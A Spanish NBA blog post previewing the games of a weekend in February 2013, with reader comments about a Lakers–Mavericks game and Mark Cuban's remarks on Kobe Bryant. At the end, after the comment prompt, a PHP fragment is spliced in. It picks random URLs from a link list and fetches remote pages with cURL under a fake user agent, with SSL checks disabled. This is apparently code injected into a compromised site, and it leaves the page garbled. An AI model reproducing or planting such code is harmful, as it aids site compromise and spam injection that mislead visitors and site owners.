Fin de semana: And the Oscar goes to…

22 de February de 2013 por MagicJohnson32

Y el Oscar en la categoría de “pringaos que nos sacan las castañas del fuego cada fin de semana” es para… ¡¡¡vosotros!!!

Enhorabuena, chavales. Llega el fin de semana de los Oscar, y vuestra valiosa e incalculable aportación al blog os será reconocida. Gracias a vuestro continuado esfuerzo y vuestra sabiduría infinita, habéis sido galardonados con el altísimo honor de volver a comentar las vicisitudes que se vayan produciendo a lo largo de los próximos tres días en la NBA.

Es decir: lo de cada fin de semana.

Superado el trade deadline sin un solo traspaso que realmente vaya a tener un impacto deportivo inmediato, nuestra atención puede volver a las pistas, donde nos esperan un total de 28 partidos, que detallamos a continuación.

VIERNES

Destacamos:

  • Rockets @ Nets (1h30). El James Harden Show viaja a Brooklyn, donde aguardan los Nets con la baja de última hora de Joe ‘Clutch’ Johnson. Los Rockets, que ya son el equipo más anotador de la NBA, necesitan seguir sumando para consolidarse en puestos de Playoffs; los Nets suman cuatro victorias seguidas y vuelven a aspirar al título de la Atlantic Division. El debut de Thomas Robinson como Rocket tendrá que esperar.
  • Blazers @ Lakers (4h30). 9º contra 10º del Oeste, los Blazers viajan al Staples con seis derrotas consecutivas y justo después de verse superados en la clasificación por los Lakers, que ante los Celtics parecieron inspirados y motivados por la pérdida de su histórico propietario. Wesley Matthews es duda y, en caso de que se confirme su baja, Víctor Claver podría ser titular.
  • Spurs @ Warriors (4h30). Comodamente asentados en la cima de la clasificación tras una nueva exhibición de Tony Parker anoche ante los Clippers, los Spurs completan un back-to-back visitando Oakland. Los Warriors detuvieron el miércoles la racha de derrotas pero los Spurs no son los Suns, y Mark Jackson va a tener que encontrar soluciones a los problemas defensivos que últimamente acusa su equipo. ¿Ayudarán las nuevas camisetas con mangas?

Otros nueve partidos se disputan la madrugada del viernes al sábado. En orden cronológico:

  • 1h00: los Bulls visitarán a Michael Jordan y sus Bobcats, Hilario y McGee se reecontrarán con sus ex equipos en el Nuggets @ Wizards, los temibles Pacers recibirán a los Pistons, y los Knicks irán a Canadá con Kenyon Martin como -ejem- gran refuerzo.
  • 1h30: los Kings se enfrentarán en Atlanta a unos Hawks todavía con Josh Smith en sus filas.
  • 2h00: Minnesota T’Wolves intentarán echar el diente a los Thunder, heridos tras la dolorosa derrota ante los Rockets; los Mavs buscarán la victoria en New Orleans para seguir con opciones de Playoffs, y los Magic, sin Redick y sólo ocho jugadores disponibles, tratarán de dar la sorpresa en Memphis.
  • 3h00: El posible debut de Jordan Crawford con los Celtics y la reunión de los hermanos Morris con la camiseta de los Suns centran el interés del partido entre Boston y Phoenix.

SÁBADO

De entre los siete partidos que se jugarán el sábado, éstos son los tres que destacamos:

  • Heat @ Sixers (1h30). Hablábamos unas líneas más arriba del James Harden Show, pero qué decir de LeBron James. Tras el All-Star se acabó la racha de los 30 puntos y +60% de acierto, pero James sigue arrasando y tiene a los Heat en cabeza del Este con nueve victorias seguidas. Los Sixers siguen en su proceso depresivo, con uno de los peores ataques de la liga y esperando a Bynum como los personajes de Samuel Beckett. Más les vale dejar de esperar y empezar a jugar a baloncesto.
  • Hawks @ Bucks (2h30). Stern, visionario como él solo, ya hizo el calendario con la idea de que Josh Smith podía acabar en Milwaukee. Al final no hubo acuerdo, pero igualmente el partido entre Hawks y Bucks -sexto y octavo del Este- llega con renovado interés, por si el debut de Redick como ciervo no fuera suficiente.
  • Jazz @ Clippers (4h30). Otros dos que se enfrentan tras frustrarse las negociaciones de traspaso entre ambos equipos. Paul Millsap acabará contrato en Utah, y los Clippers se la jugarán con la plantilla que tienen. La primera oportunidad para comprobar si sus decisiones han sido acertadas será este atractivo encuentro, en que los Chris Paul tratará de desquitarse tras el serio correctivo encajado ante los Spurs.

La jornada del sábado se completa con:

  • 1h00: Los Nuggets y Rockets visitan dos canchas asequibles, las de Bobcats y Wizards respectivamente, y a la misma hora se disputará un duelo en las catacumbas de la Conferencia Este entre Cavs y Magic.
  • 1h30: Pacers y Pistons se enfrentarán por segunda noche consecutiva, esta vez en Detroit.

DOMINGO

En la noche del 24 se celebrará la ceremonia de entrega de los Oscar, cosa que en términos NBA sólo implica que los equipos de L.A. no juegan en casa. Nueve partidos y mucho que destacar del menú dominical:

  • Lakers @ Mavs (19h00). En un horario inmejorable, podremos asistir al enfrentamiento entre los campeones de 2010 y 2011, con ambos equipos fuera de plazas de Playoffs, en busca de la identidad perdida y, sobre todo, de victorias que les permitan meterse en postseason. El ganador de este partido lo tendrá un poco más fácil.
  • Grizzlies @ Nets (1h00). El cuarto de la Conferencia Oeste visita al cuarto del Este en un partido que puede fácilmente decidirse en el duelo interior entre Marc Gasol y Brook Lopez.
  • Celtics @ Blazers (3h00). Los Celtics afrontan una parada complicada en el Rose Garden antes de cerrar su gira por el Oeste el lunes en Utah. Doc Rivers ya ha avisado de que posiblemente dé descanso a Garnett en uno de estos partidos. LaMarcus Aldridge se frota las manos ante la posibilidad de vérselas únicamente con Wilcox y Fab Melo.

Nos quedamos con los tres anteriores pero hay cosas igualmente destacables en el resto de la jornada:

  • 21h30: A la hora de cenar, partido entre G.S. Warriors y Wolves en Minnesota.
  • 0h00: A medianoche, LeBron recibirá a ‘sus’ Cavs, apenas días después de deshacerse en elogios hacia Kyrie Irving y de que se volviese a especular con un regreso de James a Cleveland cuando finalice su contrato. Además, Kings @ Hornets sin nada en juego más que posicionarse de cara al draft.
  • 1h00: Knicks y Sixers se ven las caras en un momento delicado para ambos equipos.
  • 2h00: Spurs @ Suns. Qué cerca pero qué lejos quedan aquellos duelos en Playoffs.
  • 3h30: Buen partido, al menos sobre el papel, el que cerrará el fin de semana, con la visita de los Bulls a Oklahoma City.
Comenta

26 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Qué jugador más descerebrado y torpe me parece Faried… nunca quisiera tenerlo en mi equipo por más intensidad que tenga. Ojito al pase del segundo 39 en este video, perdiendo por 4 en el último minuto… y pobre Bradley Beal

      Citar

  2. Pop dice:
    #2

    Un dato que a lo mejor pasa desapercibido: 7 tapones en 15′ para Bernard James. Me parece tremendo

      Citar

  3. Txusma dice:
    #3

    Pop:
    Un dato que a lo mejor pasa desapercibido: 7 tapones en 15? para Bernard James. Me parece tremendo

    Este es el soldado, no? Es rookie pero me da que tiene 25 o 26 años.

      Citar

  4. Esteban dice:
    #4

    y orlando jhonson? rookie de 23 años, pero tiene la pinta dek futuro sexto hombre de indiana

    hoy los pacers deberian regalar a granger a cambio de una trade exeption, y renovar a west y tener espacio para renovar a este nucleo

    los 5 titulares cada vez tienen mas margen de mejora, algo impensaso

    y de la banca surge orlando jhonson que tiene pinta de ser un jamal crawford de la vida,

    go PACERS

      Citar

  5. MagicJohnson32 dice:
    #5

    Esteban:
    y orlando jhonson? rookie de 23 años, pero tiene la pinta dek futuro sexto hombre de indiana

    hoy los pacers deberian regalar a granger a cambio de una trade exeption, y renovar a west y tener espacio para renovar a este nucleo

    los 5 titulares cada vez tienen mas margen de mejora, algo impensaso

    y de la banca surge orlando jhonson que tiene pinta de ser un jamal crawford de la vida,

    go PACERS

    Precisamente esta noche debutará Granger.

    Sobre el Blazers @ Lakers, partido bonito que ganó LA gracias a Howard y Kobe. Los Blazers estuvieron siempre en el partido, con Hickson infalible y un Batum mucho más efectivo de lo que venía estando últimamente. Pero la efectividad de Kobe (40 puntos con 23 fg) y la aparición de Howard en defensa dieron la victoria a los Lakers. Nash tuvo problemas de espalda y estuvo muy gris, y Howard recibió otro hachazo (de Claver), pero en general las impresiones fueron buenas. Sobre todo, la impresión de que Kobe y Howard a buen nivel dan para ganar muchos partidos.

      Citar

  6. Blade Petrovic dice:
    #6

    No se porque pero estos Warriors me recuersan a Smell Like Teen Spirit

      Citar

  7. Ekos dice:
    #7

    GO CAVS!

      Citar

  8. Nacho dice:
    #8

    Dos cositas:
    1.- Toronto está recibiendo el regalo del siglo entre los 76’s y los Bucks. A poco que se aprovechen ‘hunden’ a Miami en PO. Jjeje.
    2.- ¿Hay algún lugar por el blog donde podamos meter la cabeza los AntiLeBron? Joder, es que cada día recibo una hostia nueva, y no tengo la cabeza para eso…

      Citar

  9. Ruxixón dice:
    #9

    Nacho:
    Dos cositas:
    1.- Toronto está recibiendo el regalo del siglo entre los 76?s y los Bucks. A poco que se aprovechen ‘hunden’ a Miami en PO. Jjeje.
    2.- ¿Hay algún lugar por el blog donde podamos meter la cabeza los AntiLeBron? Joder, es que cada día recibo una hostia nueva, y no tengo la cabeza para eso…

    Desde Shaq no había jugador capaz de dominar los partidos como hace LeBron,es exagerado.Mal momento para los AntiLeBron,jeje.

    Y sobre el 8º del este,yo tiro del barco a los 76ers,no me parece que cuenten con los recursos necesarios para intentar remontar la diferencia con los Bucks,así que la lucha se centra entre estos y Raptors.Acierto en el fichaje de Rudy Gay por parte de Colangelo

      Citar

  10. MagicJohnson32 dice:
    #10

    Tras las derrotas de Houston y Utah, importantísimo partido esta tarde entre Lakers y Mavs. Si gana LA, se pondría a 2 partidos de los Rockets y a 3 de los Jazz, pero los Mavs llegan en buen momento. Por si fuera poco, las declaraciones de Cuban añaden morbo al partido. Recuerdo que es a las 7 de la tarde.

      Citar

  11. Ruxixón dice:
    #11

    ¿Qué dijo Cuban,Magic?

      Citar

  12. Jose Luis dice:
    #12

    Que los Lakers, considerando los salarios de su plantilla, deberían AMNISTIAR a Kobe Bryant el año próximo xD

      Citar

  13. Ruxixón dice:
    #13

    Jose Luis:
    Que los Lakers, considerando los salarios de su plantilla, deberían AMNISTIAR a Kobe Bryant el año próximo xD

    xDDDD Vaya crack.Merci Jose Luis

      Citar

  14. nba dice:
    #14

    Jose Luis:
    Que los Lakers, considerando los salarios de su plantilla, deberían AMNISTIAR a Kobe Bryant el año próximo xD

    Me da a mi que Bryant les va a hacer un hijo esta tarde a los Mavs y vamos a asistir a un partido estratosferico para callar al bocazas de Cuban

      Citar

  15. Jose Luis dice:
    #15

    Cuban sabe mucho, este partido es muy importante para los Mavs y quiere picar a Kobe, sabiendo que viene de una exhibición de 40 puntos, para que lo intente de nuevo a ver si sus compañeros se desconectan en ataque y no tiene tanto porcentaje de acierto. Kobe no caerá y comenzará como siempre, pero veremos en la segunda parte por dónde van los derroteros. Para mí, Cuban ya ha ayudado un poquito a su equipo a ganar este partido, aunque si Kobe entra en racha, los Mavs están hundidos.

      Citar

  16. Sancho88 dice:
    #16

    Blake está fenomenal tíos, a este señor nos lo han cambiado. Para el esquema de D’Antoni va de lujo, ya dijo que siempre había querido entrenarlo. La segunda unidad amarilla por fin aparece, que este año parece más seria que otras temporadas. El papel de Meeks toda la temporada es admirable, qué bien ha asumido ser suplente de Bryant y cómo está aprovechando sus minutos. A ver si se meten en playoffs coño, que poco a poco van remendando los errores

      Citar

  17. Blade Petrovic dice:
    #17

    54-54 al descanso esto esta interante señores

      Citar

  18. MagicJohnson32 dice:
    #18

    El partido está empatado y Howard apenas ha aparecido. A poco que controle las faltas en la segunda parte, creo que los Lakers deberían ganar.

      Citar

  19. Sancho88 dice:
    #19

    el duelo entre Bryant y Nowitzki está molando, a ver cómo termina. Con Nash en el equipo son más fiables en finales apretados, pero así como Bryant tiene a Nash, el alemán tiene a Vicente, que menudo temporadón lleva el tío… yo creo que va a ser final muy apretado, pero también me decanto por los amarillos

      Citar

  20. Blade Petrovic dice:
    #20

    Lo que ha hecho colison en 10 segundos!

      Citar

  21. Jose Luis dice:
    #21

    Victoria Lakers, apretada, pero sabiendo ganar. Kobe superlativo en la segunda parte, más aún que en la primera. El mejor Nowitzki de la temporada, hoy. Peace desaparecido. Nash alcanza los 20 puntos por primera vez esta temporada. PARTIDAZO de los buenos.

      Citar

  22. MagicJohnson32 dice:
    #22

    Qué grande es Kobe, pffff. Sobre todo cuando pone la cara de psicópata, jeje. Escandaloso su partido, de nuevo.

    Y qué bien ver que a Dirk todavía le quedan partidos de éstos.

      Citar

  23. Jose Luis dice:
    #23

      Citar

  24. Jose Luis dice:
    #24

      Citar

  25. Jose Luis dice:
    #25

    The Black Mamba Fourth Quarter Exhibition

      Citar

  26. rumbero dice:
    #26

    “Amnesty that” Esa fue la respuesta de Bryant por twitter. Si es que picar a Kobe suele ser mal negocio…
    Las 3 seguidas que se casca en la cara de Crowder fueron algo tremendo. Suerte de él y el buen partido de Nash porque la defensa dejo bastante que desear en muchos momentos. Toca visitar Denver, que suele ser mala plaza, y recibir a Wolves y Hawks antes de ir a Oklahoma. Importante el balance que saquen aquí para seguir metiendo presión a Utah y Rockets

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>